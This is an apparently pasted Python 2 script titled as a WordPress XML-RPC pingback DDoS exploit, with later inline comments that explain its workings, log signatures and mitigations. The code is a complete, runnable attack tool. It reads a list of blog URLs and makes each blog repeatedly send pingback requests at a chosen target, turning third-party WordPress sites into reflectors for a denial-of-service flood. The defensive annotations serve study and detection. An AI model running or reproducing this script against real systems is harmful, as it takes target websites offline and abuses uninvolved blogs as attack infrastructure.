TP2K1

XMLRPC DDoS WordPress PingBack API Remote Exploit

Jul 23rd, 2015
  1. #!/usr/bin/python
  2. import sys
  3. import socket
  4. import threading
  5. import time
  6. import os
  # Module-level lock shared by every worker thread. Thread1.run holds it only
  # around its "Starting thread" print so start-up lines do not interleave.
  7. Lock = threading.Lock()
  # main(): interactive entry point (Python 2: print statements, raw_input).
  # Opens ./list.txt, prompts for a thread count and a "Target" URL, then starts
  # one Thread1 per line read from the file. Thread1.run splits each line on
  # "?p=" and "http://", so the lines are presumably WordPress post URLs; those
  # sites act as reflectors, which means traffic at the target comes from the
  # listed blogs rather than from the host running this script.
  # Defensive relevance: a WordPress site with pingbacks enabled can be placed
  # on such a list by anyone; see the notes on Thread1 for log signatures.
  8. def main():
  9. try:
  10. in_file = open("list.txt","r")
  # Bare except: any failure to open the file is reported as "file missing".
  11. except:
  12. raw_input('You need a list.txt file to work')
  13. sys.exit(0)
  # `title` is the Windows cmd built-in that sets the console window title; the
  # call spawns a shell child process with this fixed string as its command line.
  14. os.system("title ...:: XMLRPC PingBack DDoS ::... ")
  15. print '-------------------------------------------------------------------------\n'
  16. print '\tXML-RPC PingBack API Remote DDoS'
  17. print '\tDate : 20/04/2014'
  18. print '\tTested on Windows 7 / Windows Server 2012 / FreeBSD 9.2'
  19. print '\tPython version coded by : Sikh887 \n'
  20. print '--------------------------------------------------------------------------\n\n '
  # NOTE(review): Python 2 input() evaluates whatever is typed as a Python
  # expression, so this prompt executes arbitrary code entered at the console.
  21. num_thread = input("Number of thread: ")
  22. url = raw_input("Target: ")
  # One worker per line of list.txt, numbered from 1.
  23. for i in range(num_thread):
  24. try:
  25. in_line = in_file.readline()
  26. Thread1(url, i+1, in_line).start()
  27. in_line = in_line[:-1]
  # Bare except/pass: every error while reading or starting a thread is hidden.
  28. except:
  29. pass
  # NOTE(review): the paste lost its indentation, so whether this 3-second sleep
  # sits inside the loop or after it cannot be determined from the page.
  30. time.sleep(3)
  31.  
  32.  
  # Thread1: worker thread that builds one raw HTTP POST to a blog's xmlrpc.php
  # calling pingback.ping(<Target URL>, <blog URL>) and re-sends it every
  # 3 seconds, on a new TCP connection to port 80, in an endless loop.
  # In the pingback protocol the receiving site fetches the first argument (the
  # source URI) to verify the link, which is what turns the blog into a reflector.
  #
  # Signatures visible in this code, for the reflector's web logs / WAF:
  #   - POST .../xmlrpc.php over HTTP/1.0 with methodName pingback.ping
  #   - fixed User-Agent "Internal Wordpress RPC connection"
  #   - absolute URL ("http://host/...") in the request line of a direct request
  #   - header block terminated by CRLF + bare LF instead of CRLF CRLF
  # Mitigation on WordPress sites: disable pingbacks or remove pingback.ping via
  # the xmlrpc_methods filter, or block/rate-limit xmlrpc.php when it is unused.
  # On the target side, reflected requests carry a "WordPress/<version>; <blog>"
  # User-Agent; WordPress 3.9 and later append "verifying pingback from <ip>",
  # which exposes the address that sent the XML-RPC call.
  33. class Thread1(threading.Thread):
  # Stores the target URL, the 1-based thread number and the raw list.txt line.
  34. def __init__(self, url, number, blog):
  35. self.url = url
  36. self.number = number
  37. self.blog = blog
  38. threading.Thread.__init__(self)
  39.  
  40. def run(self):
  41. Lock.acquire()
  42. print 'Starting thread #%s'%self.number
  43. Lock.release()
  # This copy of the XML-RPC payload is used only to compute Content-Length;
  # the request below embeds its own copy of the XML.
  44. function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>"%(self.url, self.blog)
  45. request_lenght = len(function_pingback)
  # blog_cleaned: the list entry with everything from "?p=" onward dropped.
  # blog_cleaned1: the host part, used for the Host header and the connect().
  46. try:
  47. self.blog_cleaned = self.blog.split("?p=")[0]
  48. self.blog_cleaned1 = self.blog_cleaned.split("http://")[1].split("/")[0]
  # A line without "http://" raises IndexError above; sys.exit() inside a thread
  # raises SystemExit, which ends only this thread, without any message.
  49. except:
  50. sys.exit(0)
  # Hand-built request; both URLs are interpolated into the XML without escaping.
  51. request = "POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>\r\n\r\n"%(self.blog_cleaned, self.blog_cleaned1, request_lenght, self.url, self.blog)
  # Endless loop: one new TCP connection to port 80 per iteration, 3 s apart.
  # The response is never read (no recv call), so the script cannot tell whether
  # the blog accepted or rejected the pingback.
  52. while True:
  53. time.sleep(3)
  54. try:
  55. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
  56. s.connect((self.blog_cleaned1, 80))
  57. s.send(request)
  58. print"Thread %s | Blog %s"%(self.number, self.blog_cleaned1)
  # Bare except: connection and send errors are discarded; `ok` is never read.
  59. except:
  60. ok = 0
  # Unconditional call: there is no `if __name__ == "__main__"` guard, so the
  # prompts and worker threads also start if this file is merely imported.
  61. main()